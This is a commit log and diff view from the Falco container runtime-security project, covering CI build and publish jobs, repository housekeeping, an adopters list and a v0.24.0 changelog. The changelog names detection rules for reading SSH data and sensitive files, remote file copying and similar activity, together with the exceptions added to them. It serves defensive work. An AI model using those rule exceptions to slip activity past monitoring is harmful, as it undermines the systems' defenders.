2020-05-21 10:57:42 +02:00
Mark Stemm
fa3d2eb473 rule(macro trusted_logging_images): Let azure-npm image write to /var/log
"The Azure's NPM is a a daemonset that supports network policies as
defined by the Kubernetes policy specification."

Example event:

---
Log files were tampered (user=root command=azure-npm
file=/var/log/iptables.conf CID1 image=mcr.microsoft.com/containernetworking/azure-npm)
---

Signed-off-by: Mark Stemm <mark.stemm@gmail.com>
2020-05-21 10:57:42 +02:00
Mark Stemm
acb3f94786 rule(macro trusted_logging_images): Add addl fluentd image
Openshift specific variant, example alert:

---
Log files were tampered (user=root command=fluentd /usr/bin/fluentd
--no-supervisor file=/var/log/journal.pos CID1 image=registry.redhat.io/openshift3/ose-logging-fluentd)
---

Signed-off-by: Mark Stemm <mark.stemm@gmail.com>
2020-05-21 10:57:42 +02:00
kaizhe
d1af7e139f rule update: fix macro reference
Signed-off-by: kaizhe <derek0405@gmail.com>
2020-05-21 10:55:53 +02:00
Leonardo Grasso
434a5abc8b docs(CONTRIBUTING.md): update slack channel URL
Signed-off-by: Leonardo Grasso <me@leonardograsso.com>
2020-05-20 18:07:51 +02:00
Lorenzo Fontana
fd97f99b9f build: focal builder generic kernel headers
Co-Authored-By: Leonardo Di Donato <leodidonato@gmail.com>
Signed-off-by: Lorenzo Fontana <lo@linux.com>
2020-05-19 16:34:58 +02:00
Lorenzo Fontana
555bf1f10d build: use ubuntu focal instead of bionic during the ubuntu CI step
Co-Authored-By: Leonardo Di Donato <leodidonato@gmail.com>
Signed-off-by: Lorenzo Fontana <lo@linux.com>
2020-05-19 16:34:58 +02:00
Leonardo Grasso
f3f512c6dd fix(.circleci): correct publishing command
Signed-off-by: Leonardo Grasso <me@leonardograsso.com>
2020-05-18 18:16:53 +02:00
Leonardo Grasso
8d79c11953 fix(CHANGELOG.md): correct typo
Signed-off-by: Leonardo Grasso <me@leonardograsso.com>

Co-authored-by: Leo Di Donato <leodidonato@gmail.com>
2020-05-18 16:56:21 +02:00
Leonardo Grasso
439152c8d8 docs: changelog for 0.23.0
Signed-off-by: Leonardo Grasso <me@leonardograsso.com>
2020-05-18 16:56:21 +02:00
Leonardo Grasso
3d3d537d85 update(docker/falco-driver-loader): propagate all args
Signed-off-by: Leonardo Grasso <me@leonardograsso.com>
2020-05-18 15:16:59 +02:00
Leonardo Grasso
88dbc78a44 fix(scripts/falco-driver-loader): exit when bpf download fails
Signed-off-by: Leonardo Grasso <me@leonardograsso.com>
2020-05-18 15:16:59 +02:00
Leonardo Grasso
59c2e6b421 update(scripts/falco-driver-loader): break apart logic
Signed-off-by: Leonardo Grasso <me@leonardograsso.com>
2020-05-18 15:16:59 +02:00
Leonardo Grasso
33c93e6c29 chore(scripts/falco-driver-loader): improve messages
Signed-off-by: Leonardo Grasso <me@leonardograsso.com>
2020-05-18 15:16:59 +02:00
Leonardo Grasso
46483339a3 fix(test): correct kernel module name
Signed-off-by: Leonardo Grasso <me@leonardograsso.com>
2020-05-18 14:08:25 +02:00
Leonardo Grasso
762ef015b8 fix(scripts): correct kernel module name
Signed-off-by: Leonardo Grasso <me@leonardograsso.com>
2020-05-18 14:08:25 +02:00
Leonardo Grasso
b887c92c91 docs(RELEASE.md): correct typo
Signed-off-by: Leonardo Grasso <me@leonardograsso.com>
2020-05-18 11:41:05 +02:00
Reshad Patuck
efd0bf1967 fix(falco-driver-loader): target for ubuntu is ubuntu-generic
The upstream files for the generic Ubuntu kernel are all called ubuntu-generic
see: https://dl.bintray.com/falcosecurity/driver/96bd9bc560f67742738eb7255aeb4d03046b8045/

Signed-off-by: Reshad Patuck <reshad@patuck.net>
2020-05-15 19:20:29 +02:00
Leo Di Donato
5c69639a69 update(.github): remove examples and integrations from PR template
Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
2020-05-15 11:27:18 +02:00
Leonardo Grasso
b8875df48f fix(.circleci): correct no-driver image aliasing
Signed-off-by: Leonardo Grasso <me@leonardograsso.com>
2020-05-15 11:20:56 +02:00
Leonardo Grasso
368817a95d fix(docker/no-driver): correct config value substitution
Signed-off-by: Leonardo Grasso <me@leonardograsso.com>
2020-05-15 11:20:56 +02:00
Leonardo Grasso
622a6c1e44 fix(test/driver-loader): source script to get env vars populated
Signed-off-by: Leonardo Grasso <me@leonardograsso.com>
2020-05-15 11:19:31 +02:00
Leonardo Grasso
95e7242d13 test: add driver-loader integration tests
Signed-off-by: Leonardo Grasso <me@leonardograsso.com>
2020-05-15 11:19:31 +02:00
Leonardo Grasso
c42cb1858c update(docker/falco): rename folder for naminig consistency
Signed-off-by: Leonardo Grasso <me@leonardograsso.com>
2020-05-14 18:59:29 +02:00
Leonardo Grasso
935d9f5378 fix(docker/no-driver): enable time_format_iso_8601 by default
Signed-off-by: Leonardo Grasso <me@leonardograsso.com>
2020-05-14 18:59:29 +02:00
Leonardo Grasso
2345ea2770 new(docker): add falco-no-driver image
Signed-off-by: Leonardo Grasso <me@leonardograsso.com>
2020-05-14 18:59:29 +02:00
Leonardo Grasso
901239c3c8 docs(docker): add falcosecurity/falco-no-driver image
Signed-off-by: Leonardo Grasso <me@leonardograsso.com>
2020-05-14 18:59:29 +02:00
Lorenzo Fontana
d0f4f7cbb5 docs(tests): fix typo
Co-authored-by: Leonardo Grasso <me@leonardograsso.com>
Signed-off-by: Lorenzo Fontana <lo@linux.com>
2020-05-14 15:02:15 +02:00
Lorenzo Fontana
d67b3f5577 docs(CONTRIBUTING): mention the unit test page on CONTRIBUTING
Signed-off-by: Lorenzo Fontana <lo@linux.com>
2020-05-14 15:02:15 +02:00
Lorenzo Fontana
1d43d4eb40 build(tests): allow to pass FALCO_TESTS_ARGUMENTS to the tests target
Signed-off-by: Lorenzo Fontana <lo@linux.com>
2020-05-14 15:02:15 +02:00
Lorenzo Fontana
e9e2547a44 docs(tests): initial unit-tests readme
Signed-off-by: Lorenzo Fontana <lo@linux.com>
2020-05-14 15:02:15 +02:00
Leonardo Grasso
0f23a9477f update(docker/OWNERS): add myself to approvers
Signed-off-by: Leonardo Grasso <me@leonardograsso.com>
2020-05-14 14:09:46 +02:00
Leonardo Grasso
9242c45214 update(examples): move /examples to contrib repo
Signed-off-by: Leonardo Grasso <me@leonardograsso.com>
2020-05-14 12:54:09 +02:00
Leonardo Grasso
ede2ef8706 update(integration): move /integration to contrib repo
Signed-off-by: Leonardo Grasso <me@leonardograsso.com>
2020-05-13 15:15:40 +02:00
Leonardo Grasso
0c4074b7a9 update(docker): remove minimal image
Signed-off-by: Leonardo Grasso <me@leonardograsso.com>
2020-05-13 10:39:07 +02:00
Leonardo Grasso
05c684d68c test: add bin package (tar.gz) to integration test
Signed-off-by: Leonardo Grasso <me@leonardograsso.com>
2020-05-12 19:22:49 +02:00
Leonardo Grasso
a520a9b666 update(proposals/20200506-artifacts-scope-part-2.md): resolution about image naming
Signed-off-by: Leonardo Grasso <me@leonardograsso.com>
2020-05-12 18:53:46 +02:00
Leonardo Grasso
9393ae9e03 fix(proposals/20200506-artifacts-scope): typos
Signed-off-by: Leonardo Grasso <me@leonardograsso.com>
2020-05-12 18:53:46 +02:00
Leonardo Grasso
fcd2849a5d update(proposals/20200506-artifacts-scope): refinements
Signed-off-by: Leonardo Grasso <me@leonardograsso.com>

As per https://github.com/falcosecurity/falco/pull/1184/files#r420856406
2020-05-12 18:53:46 +02:00
Leo Di Donato
c7573c3db9 update(proposals/20200506-artifacts-scope-part-2): refinements to the future SoA of Falco artifacts and images
Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
2020-05-12 18:53:46 +02:00
Leo Di Donato
737ef557ae update(proposals/20200506-artifacts-scope-part-1): improvements to SoA of Falco artifacts and images
Co-authored-by: Lorenzo Fontana <lo@linux.com>
Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>

Co-authored-by: Lorenzo Fontana <lo@linux.com>
2020-05-12 18:53:46 +02:00
Leonardo Grasso
078c98f847 docs(proposal): split artifacts scope proposal in 2 parts
Still some TODOs

Signed-off-by: Leonardo Grasso <me@leonardograsso.com>
2020-05-12 18:53:46 +02:00
Leonardo Grasso
63eafd2ff8 docs(proposals/20200504-falco-artifacts-scope.md): update from review
Signed-off-by: Leonardo Grasso <me@leonardograsso.com>
2020-05-12 18:53:46 +02:00
Leonardo Grasso
69714a8124 fix(proposals/20200504-falco-artifacts-scope.md): minor fixes
Co-Authored-By: Leonardo Di Donato <leodidonato@gmail.com>
Signed-off-by: Leonardo Grasso <me@leonardograsso.com>
2020-05-12 18:53:46 +02:00
Kris Nova
b6bbc27e57 feat(docs): "Official Support" is the highest and most coveted status.
Signed-off-by: Kris Nova <kris@nivenly.com>
2020-05-12 18:53:46 +02:00
Kris Nova
df3fc73e55 feat(docs): Updating proposal with new vernacular
Signed-off-by: Kris Nova <kris@nivenly.com>
2020-05-12 18:53:46 +02:00
Kris Nova
b9bf985fae feat(proposal): Adding artifacts scope and proposal
- Highlights scope of Falco
 - Highlights subprojects and groups evolution
 - Defines build artifacts
 - Defines artifact naming convention
 - Dictates that we take action to make these changes happen

Signed-off-by: Kris Nova <kris@nivenly.com>
2020-05-12 18:53:46 +02:00
Mark Stemm
8adcc95bac Add unit tests for ruleset handling
A new unit test file test_rulesets adds tests for the following:

 - enabling/disabling rules based on substrings
 - enabling/disabling rules based on exact matches
 - enabling/disabling rules based on tags

There are variants that test for default and non-default rulesets.

Signed-off-by: Mark Stemm <mark.stemm@gmail.com>
2020-05-11 14:15:42 +02:00
Mark Stemm
176d6f2bfe Make token bucket unit test pass valgrind
Previously, valgrind was complaining about the leaked token bucket.

Signed-off-by: Mark Stemm <mark.stemm@gmail.com>
2020-05-11 14:15:42 +02:00
Mark Stemm
7fd350d49a Allow exact matches for rule names
Currently, when calling enable_rule, the provided rule name pattern is a
substring match, that is if the rules file has a rule "My fantastic
rule", and you call engine->enable_rule("fantastic", true), the rule
will be enabled.

This can cause problems if one rule name is a complete subset of another
rule name e.g. rules "My rule" and "My rule is great", and calling
engine->enable_rule("My rule", true).

To allow for this case, add an alternate method enable_rule_exact() in
both default ruleset and ruleset variants. In this case, the rule name
must be an exact match.

In the underlying ruleset code, add a "match_exact" option to
falco_ruleset::enable() that denotes whether the substring is an exact
or substring match.

This doesn't change the default behavior of falco in any way, as the
existing calls still use enable_rule().

Signed-off-by: Mark Stemm <mark.stemm@gmail.com>
2020-05-11 14:15:42 +02:00
Leonardo Grasso
900a3b5860 refactor(docker): driverloader to falco-driver-loader
Signed-off-by: Leonardo Grasso <me@leonardograsso.com>
2020-05-08 18:08:03 +02:00
Leonardo Di Donato
3991552553 update(cmake/modules): bump driver version to 96bd9bc560f67742738eb7255aeb4d03046b8045
This driver version contains a fix for kernels < 3.17

Co-authored-by: Lorenzo Fontana <lo@linux.com>
Signed-off-by: Leonardo Di Donato <leodidonato@gmail.com>
2020-05-06 20:35:31 +02:00
Leonardo Grasso
83d5ce4d58 fix(.circleci): correct driverloader's base tag
Signed-off-by: Leonardo Grasso <me@leonardograsso.com>
2020-05-04 15:05:53 +02:00
Leonardo Grasso
2e703f0565 refactor(docker/driverloader): rename build arg
Co-Authored-By: Leonardo Di Donato <leodidonato@gmail.com>
Signed-off-by: Leonardo Grasso <me@leonardograsso.com>
2020-05-04 15:05:53 +02:00
Leonardo Grasso
24c0e80bd8 chore(docker): clean up unused set -e
Co-authored-by: Leonardo Di Donato <leodidonato@gmail.com>
Signed-off-by: Leonardo Grasso <me@leonardograsso.com>
2020-05-04 11:27:38 +02:00
Leonardo Grasso
5e421c9ac4 docs(docker): add driverloader into supported images
Signed-off-by: Leonardo Grasso <me@leonardograsso.com>
2020-05-04 11:27:38 +02:00
Leonardo Grasso
6a20526c4b update(.circleci): add steps to build and publish the driverloader image
Signed-off-by: Leonardo Grasso <me@leonardograsso.com>
2020-05-04 11:27:38 +02:00
Leonardo Grasso
63259f3885 new(docker/driverloader): docker image to load the driver
Signed-off-by: Leonardo Grasso <me@leonardograsso.com>
2020-05-04 11:27:38 +02:00
Lorenzo Fontana
9909af8bfb fix(scripts): fix ignored calls script to use the new paths
Co-Authored-By: Leonardo Di Donato <leodidonato@gmail.com>
Signed-off-by: Lorenzo Fontana <lo@linux.com>
2020-05-01 19:06:51 +02:00
172 changed files with 2883 additions and 3723 deletions

View File

@@ -2,9 +2,9 @@ version: 2
jobs:
# Build using ubuntu LTS
# This build is dynamic, most dependencies are taken from the OS
"build/ubuntu-bionic":
"build/ubuntu-focal":
docker:
- image: ubuntu:bionic
- image: ubuntu:focal
steps:
- checkout
- run:
@@ -12,19 +12,19 @@ jobs:
command: apt update -y
- run:
name: Install dependencies
command: apt install libssl-dev libyaml-dev libncurses-dev libc-ares-dev libprotobuf-dev protobuf-compiler libjq-dev libyaml-cpp-dev libgrpc++-dev protobuf-compiler-grpc rpm linux-headers-$(uname -r) libelf-dev cmake build-essential libcurl4-openssl-dev -y
command: DEBIAN_FRONTEND=noninteractive apt install libssl-dev libyaml-dev libncurses-dev libc-ares-dev libprotobuf-dev protobuf-compiler libjq-dev libyaml-cpp-dev libgrpc++-dev protobuf-compiler-grpc rpm libelf-dev cmake build-essential libcurl4-openssl-dev linux-headers-generic clang llvm git -y
- run:
name: Prepare project
command: |
mkdir build
pushd build
cmake ..
cmake -DBUILD_BPF=On ..
popd
- run:
name: Build
command: |
pushd build
make -j4 all
KERNELDIR=/lib/modules/$(ls /lib/modules)/build make -j4 all
popd
- run:
name: Run unit tests
@@ -34,9 +34,9 @@ jobs:
popd
# Debug build using ubuntu LTS
# This build is dynamic, most dependencies are taken from the OS
"build/ubuntu-bionic-debug":
"build/ubuntu-focal-debug":
docker:
- image: ubuntu:bionic
- image: ubuntu:focal
steps:
- checkout
- run:
@@ -44,19 +44,19 @@ jobs:
command: apt update -y
- run:
name: Install dependencies
command: apt install libssl-dev libyaml-dev libncurses-dev libc-ares-dev libprotobuf-dev protobuf-compiler libjq-dev libyaml-cpp-dev libgrpc++-dev protobuf-compiler-grpc rpm linux-headers-$(uname -r) libelf-dev cmake build-essential libcurl4-openssl-dev -y
command: DEBIAN_FRONTEND=noninteractive apt install libssl-dev libyaml-dev libncurses-dev libc-ares-dev libprotobuf-dev protobuf-compiler libjq-dev libyaml-cpp-dev libgrpc++-dev protobuf-compiler-grpc rpm libelf-dev cmake build-essential libcurl4-openssl-dev linux-headers-generic clang llvm git -y
- run:
name: Prepare project
command: |
mkdir build
pushd build
cmake -DCMAKE_BUILD_TYPE=debug ..
cmake -DCMAKE_BUILD_TYPE=debug -DBUILD_BPF=On ..
popd
- run:
name: Build
command: |
pushd build
make -j4 all
KERNELDIR=/lib/modules/$(ls /lib/modules)/build make -j4 all
popd
- run:
name: Run unit tests
@@ -138,6 +138,15 @@ jobs:
- run:
name: Execute integration tests
command: /usr/bin/entrypoint test
"tests/driver-loader/integration":
machine:
image: ubuntu-1604:202004-01
steps:
- attach_workspace:
at: /tmp/ws
- run:
name: Execute driver-loader integration tests
command: /tmp/ws/source/falco/test/driver-loader/run_test.sh /tmp/ws/build/release/
# Sign rpm packages
"rpm/sign":
docker:
@@ -208,26 +217,27 @@ jobs:
- checkout
- setup_remote_docker
- run:
name: Build and publish slim-dev
name: Build and publish no-driver-dev
command: |
FALCO_VERSION=$(cat /build/release/userspace/falco/config_falco.h | grep 'FALCO_VERSION ' | cut -d' ' -f3 | sed -e 's/^"//' -e 's/"$//')
docker build --build-arg VERSION_BUCKET=deb-dev --build-arg FALCO_VERSION=${FALCO_VERSION} -t falcosecurity/falco:master-slim docker/slim
docker build --build-arg VERSION_BUCKET=bin-dev --build-arg FALCO_VERSION=${FALCO_VERSION} -t falcosecurity/falco-no-driver:master docker/no-driver
docker tag falcosecurity/falco-no-driver:master falcosecurity/falco:master-slim
echo ${DOCKERHUB_SECRET} | docker login -u ${DOCKERHUB_USER} --password-stdin
docker push falcosecurity/falco-no-driver:master
docker push falcosecurity/falco:master-slim
- run:
name: Build and publish minimal-dev
command: |
FALCO_VERSION=$(cat /build/release/userspace/falco/config_falco.h | grep 'FALCO_VERSION ' | cut -d' ' -f3 | sed -e 's/^"//' -e 's/"$//')
docker build --build-arg VERSION_BUCKET=bin-dev --build-arg FALCO_VERSION=${FALCO_VERSION} -t falcosecurity/falco:master-minimal docker/minimal
echo ${DOCKERHUB_SECRET} | docker login -u ${DOCKERHUB_USER} --password-stdin
docker push falcosecurity/falco:master-minimal
- run:
name: Build and publish dev
command: |
FALCO_VERSION=$(cat /build/release/userspace/falco/config_falco.h | grep 'FALCO_VERSION ' | cut -d' ' -f3 | sed -e 's/^"//' -e 's/"$//')
docker build --build-arg VERSION_BUCKET=deb-dev --build-arg FALCO_VERSION=${FALCO_VERSION} -t falcosecurity/falco:master docker/stable
docker build --build-arg VERSION_BUCKET=deb-dev --build-arg FALCO_VERSION=${FALCO_VERSION} -t falcosecurity/falco:master docker/falco
echo ${DOCKERHUB_SECRET} | docker login -u ${DOCKERHUB_USER} --password-stdin
docker push falcosecurity/falco:master
- run:
name: Build and publish dev falco-driver-loader-dev
command: |
docker build --build-arg FALCO_IMAGE_TAG=master -t falcosecurity/falco-driver-loader:master docker/driver-loader
echo ${DOCKERHUB_SECRET} | docker login -u ${DOCKERHUB_USER} --password-stdin
docker push falcosecurity/falco-driver-loader:master
# Publish the packages
"publish/packages":
docker:
@@ -267,41 +277,47 @@ jobs:
- checkout
- setup_remote_docker
- run:
name: Build and publish slim
name: Build and publish no-driver
command: |
docker build --build-arg VERSION_BUCKET=deb --build-arg FALCO_VERSION=${CIRCLE_TAG} -t "falcosecurity/falco:${CIRCLE_TAG}-slim" docker/slim
docker tag "falcosecurity/falco:${CIRCLE_TAG}-slim" falcosecurity/falco:latest-slim
docker build --build-arg VERSION_BUCKET=bin --build-arg FALCO_VERSION=${CIRCLE_TAG} -t "falcosecurity/falco-no-driver:${CIRCLE_TAG}" docker/no-driver
docker tag "falcosecurity/falco-no-driver:${CIRCLE_TAG}" falcosecurity/falco-no-driver:latest
docker tag "falcosecurity/falco-no-driver:${CIRCLE_TAG}" "falcosecurity/falco:${CIRCLE_TAG}-slim"
docker tag "falcosecurity/falco-no-driver:${CIRCLE_TAG}" "falcosecurity/falco:latest-slim"
echo ${DOCKERHUB_SECRET} | docker login -u ${DOCKERHUB_USER} --password-stdin
docker push "falcosecurity/falco-no-driver:${CIRCLE_TAG}"
docker push "falcosecurity/falco-no-driver:latest"
docker push "falcosecurity/falco:${CIRCLE_TAG}-slim"
docker push "falcosecurity/falco:latest-slim"
- run:
name: Build and publish minimal
name: Build and publish falco
command: |
FALCO_VERSION=$(cat /build/release/userspace/falco/config_falco.h | grep 'FALCO_VERSION ' | cut -d' ' -f3 | sed -e 's/^"//' -e 's/"$//')
docker build --build-arg VERSION_BUCKET=bin --build-arg FALCO_VERSION=${FALCO_VERSION} -t "falcosecurity/falco:${CIRCLE_TAG}-minimal" docker/minimal
docker tag "falcosecurity/falco:${CIRCLE_TAG}-minimal" falcosecurity/falco:latest-minimal
echo ${DOCKERHUB_SECRET} | docker login -u ${DOCKERHUB_USER} --password-stdin
docker push "falcosecurity/falco:${CIRCLE_TAG}-minimal"
docker push "falcosecurity/falco:latest-minimal"
- run:
name: Build and publish stable
command: |
docker build --build-arg VERSION_BUCKET=deb --build-arg FALCO_VERSION=${CIRCLE_TAG} -t "falcosecurity/falco:${CIRCLE_TAG}" docker/stable
docker build --build-arg VERSION_BUCKET=deb --build-arg FALCO_VERSION=${CIRCLE_TAG} -t "falcosecurity/falco:${CIRCLE_TAG}" docker/falco
docker tag "falcosecurity/falco:${CIRCLE_TAG}" falcosecurity/falco:latest
echo ${DOCKERHUB_SECRET} | docker login -u ${DOCKERHUB_USER} --password-stdin
docker push "falcosecurity/falco:${CIRCLE_TAG}"
docker push "falcosecurity/falco:latest"
- run:
name: Build and publish falco-driver-loader
command: |
docker build --build-arg FALCO_IMAGE_TAG=${CIRCLE_TAG} -t "falcosecurity/falco-driver-loader:${CIRCLE_TAG}" docker/driver-loader
docker tag "falcosecurity/falco-driver-loader:${CIRCLE_TAG}" falcosecurity/falco-driver-loader:latest
echo ${DOCKERHUB_SECRET} | docker login -u ${DOCKERHUB_USER} --password-stdin
docker push "falcosecurity/falco-driver-loader:${CIRCLE_TAG}"
docker push "falcosecurity/falco-driver-loader:latest"
workflows:
version: 2
build_and_test:
jobs:
- "build/ubuntu-bionic"
- "build/ubuntu-bionic-debug"
- "build/ubuntu-focal"
- "build/ubuntu-focal-debug"
- "build/centos7"
- "build/centos7-debug"
- "tests/integration":
requires:
- "build/centos7"
- "tests/driver-loader/integration":
requires:
- "build/centos7"
- "rpm/sign":
context: falco
filters:
@@ -329,6 +345,7 @@ workflows:
only: master
requires:
- "publish/packages-dev"
- "tests/driver-loader/integration"
release:
jobs:
- "build/centos7":

View File

@@ -40,12 +40,8 @@ Please remove the leading whitespace before the `/kind <>` you uncommented.
> /area engine
> /area examples
> /area rules
> /area integrations
> /area tests
> /area proposals

5
.github/stale.yml vendored
View File

@@ -6,7 +6,6 @@ daysUntilClose: 7
exemptLabels:
- cncf
- roadmap
- enhancement
- "help wanted"
# Label to use when marking an issue as stale
staleLabel: wontfix
@@ -15,5 +14,7 @@ markComment: >
This issue has been automatically marked as stale because it has not had
recent activity. It will be closed if no further activity occurs. Thank you
for your contributions.
Issues labeled "cncf", "roadmap" and "help wanted" will not be automatically closed.
Please refer to a maintainer to get such label added if you think this should be kept open.
# Comment to post when closing a stale issue. Set to `false` to disable
closeComment: false
closeComment: false

View File

@@ -8,8 +8,13 @@ This is a list of production adopters of Falco (in alphabetical order):
* [Frame.io](https://frame.io/) - Frame.io is a cloud-based (SaaS) video review and collaboration platform that enables users to securely upload source media, work-in-progress edits, dailies, and more into private workspaces where they can invite their team and clients to collaborate on projects. Understanding what is running on production servers, and the context around why things are running is even more tricky now that we have further abstractions like Docker and Kubernetes. To get this needed visibility into our system, we rely on Falco. Falco's ability to collect raw system calls such as open, connect, exec, along with their arguments offer key insights on what is happening on the production system and became the foundation of our intrusion detection and alerting system.
* [GitLab](https://about.gitlab.com/direction/defend/container_host_security/) - GitLab is a complete DevOps platform, delivered as a single application, fundamentally changing the way Development, Security, and Ops teams collaborate. GitLab Ultimate provides the single tool teams need to find, triage, and fix vulnerabilities in applications, services, and cloud-native environments enabling them to manage their risk. This provides them with repeatable, defensible processes that automate security and compliance policies. GitLab includes a tight integration with Falco, allowing users to defend their containerized applications from attacks while running in production.
* [League](https://league.com/ca/) - League provides health benefits management services to help employees understand and get the most from their benefits, and employers to provide effective, efficient plans. Falco is used to monitor our deployed services on Kubernetes, protecting against malicious access to containerswhich could lead to leaks of PHI or other sensitive data. The Falco alerts are logged in Stackdriver for grouping and further analysis. In the future, we're hoping for integrations with Prometheus and AlertManager as well.
* [Logz.io](https://logz.io/) - Logz.io is a cloud observability platform for modern engineering teams. The Logz.io platform consists of three products — Log Management, Infrastructure Monitoring, and Cloud SIEM — that work together to unify the jobs of monitoring, troubleshooting, and security. We empower engineers to deliver better software by offering the world's most popular open source observability tools — the ELK Stack, Grafana, and Jaeger — in a single, easy to use, and powerful platform purpose-built for monitoring distributed cloud environments. Cloud SIEM supports data from multiple sources, including Falco's alerts, and offers useful rules and dashboards content to visualize and manage incidents across your systems in a unified UI.
* https://logz.io/blog/k8s-security-with-falco-and-cloud-siem/
* [Preferral](https://www.preferral.com) - Preferral is a HIPAA-compliant platform for Referral Management and Online Referral Forms. Preferral streamlines the referral process for patients, specialists and their referral partners. By automating the referral process, referring practices spend less time on the phone, manual efforts are eliminated, and patients get the right care from the right specialist. Preferral leverages Falco to provide a Host Intrusion Detection System to meet their HIPPA compliance requirements.
* https://hipaa.preferral.com/01-preferral_hipaa_compliance/

View File

@@ -2,9 +2,156 @@
This file documents all notable changes to Falco. The release numbering uses [semantic versioning](http://semver.org).
## v0.24.0
Released on 2020-07-16
### Major Changes
* new: Falco now supports userspace instrumentation with the -u flag [[#1195](https://github.com/falcosecurity/falco/pull/1195)]
* BREAKING CHANGE: --stats_interval is now --stats-interval [[#1308](https://github.com/falcosecurity/falco/pull/1308)]
* new: auto threadiness for gRPC server [[#1271](https://github.com/falcosecurity/falco/pull/1271)]
* BREAKING CHANGE: server streaming gRPC outputs method is now `falco.outputs.service/get` [[#1241](https://github.com/falcosecurity/falco/pull/1241)]
* new: new bi-directional async streaming gRPC outputs (`falco.outputs.service/sub`) [[#1241](https://github.com/falcosecurity/falco/pull/1241)]
* new: unix socket for the gRPC server [[#1217](https://github.com/falcosecurity/falco/pull/1217)]
### Minor Changes
* update: driver version is 85c88952b018fdbce2464222c3303229f5bfcfad now [[#1305](https://github.com/falcosecurity/falco/pull/1305)]
* update: `SKIP_MODULE_LOAD` renamed to `SKIP_DRIVER_LOADER` [[#1297](https://github.com/falcosecurity/falco/pull/1297)]
* docs: add leogr to OWNERS [[#1300](https://github.com/falcosecurity/falco/pull/1300)]
* update: default threadiness to 0 ("auto" behavior) [[#1271](https://github.com/falcosecurity/falco/pull/1271)]
* update: k8s audit endpoint now defaults to /k8s-audit everywhere [[#1292](https://github.com/falcosecurity/falco/pull/1292)]
* update(falco.yaml): `webserver.k8s_audit_endpoint` default value changed from `/k8s_audit` to `/k8s-audit` [[#1261](https://github.com/falcosecurity/falco/pull/1261)]
* docs(test): instructions to run regression test suites locally [[#1234](https://github.com/falcosecurity/falco/pull/1234)]
### Bug Fixes
* fix: --stats-interval correctly accepts values >= 999 (ms) [[#1308](https://github.com/falcosecurity/falco/pull/1308)]
* fix: make the eBPF driver build work on CentOS 8 [[#1301](https://github.com/falcosecurity/falco/pull/1301)]
* fix(userspace/falco): correct options handling for `buffered_output: false` which was not honored for the `stdout` output [[#1296](https://github.com/falcosecurity/falco/pull/1296)]
* fix(userspace/falco): honor -M also when using a trace file [[#1245](https://github.com/falcosecurity/falco/pull/1245)]
* fix: high CPU usage when using server streaming gRPC outputs [[#1241](https://github.com/falcosecurity/falco/pull/1241)]
* fix: missing newline from some log messages (eg., token bucket depleted) [[#1257](https://github.com/falcosecurity/falco/pull/1257)]
### Rule Changes
* rule(Container Drift Detected (chmod)): disabled by default [[#1316](https://github.com/falcosecurity/falco/pull/1316)]
* rule(Container Drift Detected (open+create)): disabled by default [[#1316](https://github.com/falcosecurity/falco/pull/1316)]
* rule(Write below etc): allow snapd to write its unit files [[#1289](https://github.com/falcosecurity/falco/pull/1289)]
* rule(macro remote_file_copy_procs): fix reference to remote_file_copy_binaries [[#1224](https://github.com/falcosecurity/falco/pull/1224)]
* rule(list allowed_k8s_users): whitelisted kube-apiserver-healthcheck user created by kops >= 1.17.0 for the kube-apiserver-healthcheck sidecar [[#1286](https://github.com/falcosecurity/falco/pull/1286)]
* rule(Change thread namespace): Allow `protokube`, `dockerd`, `tini` and `aws` binaries to change thread namespace. [[#1222](https://github.com/falcosecurity/falco/pull/1222)]
* rule(macro exe_running_docker_save): to filter out cmdlines containing `/var/run/docker`. [[#1222](https://github.com/falcosecurity/falco/pull/1222)]
* rule(macro user_known_cron_jobs): new macro to be overridden to list known cron jobs [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
* rule(Schedule Cron Jobs): exclude known cron jobs [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
* rule(macro user_known_update_package_registry): new macro to be overridden to list known package registry update [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
* rule(Update Package Registry): exclude known package registry update [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
* rule(macro user_known_read_ssh_information_activities): new macro to be overridden to list known activities that read SSH info [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
* rule(Read ssh information): do not throw for activities known to read SSH info [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
* rule(macro user_known_read_sensitive_files_activities): new macro to be overridden to list activities known to read sensitive files [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
* rule(Read sensitive file trusted after startup): do not throw for activities known to read sensitive files [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
* rule(Read sensitive file untrusted): do not throw for activities known to read sensitive files [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
* rule(macro user_known_write_rpm_database_activities): new macro to be overridden to list activities known to write RPM database [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
* rule(Write below rpm database): do not throw for activities known to write RPM database [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
* rule(macro user_known_db_spawned_processes): new macro to be overridden to list processes known to spawn DB [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
* rule(DB program spawned process): do not throw for processes known to spawn DB [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
* rule(macro user_known_modify_bin_dir_activities): new macro to be overridden to list activities known to modify bin directories [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
* rule(Modify binary dirs): do not throw for activities known to modify bin directories [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
* rule(macro user_known_mkdir_bin_dir_activities): new macro to be overridden to list activities known to create directories below bin directories [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
* rule(Mkdir binary dirs): do not throw for activities known to create directories below bin directories [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
* rule(macro user_known_system_user_login): new macro to exclude known system user logins [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
* rule(System user interactive): do not throw for known system user logins [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
* rule(macro user_known_user_management_activities): new macro to be overridden to list activities known to do user managements activities [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
* rule(User mgmt binaries): do not throw for activities known to do user managements activities [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
* rule(macro user_known_create_files_below_dev_activities): new macro to be overridden to list activities known to create files below dev [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
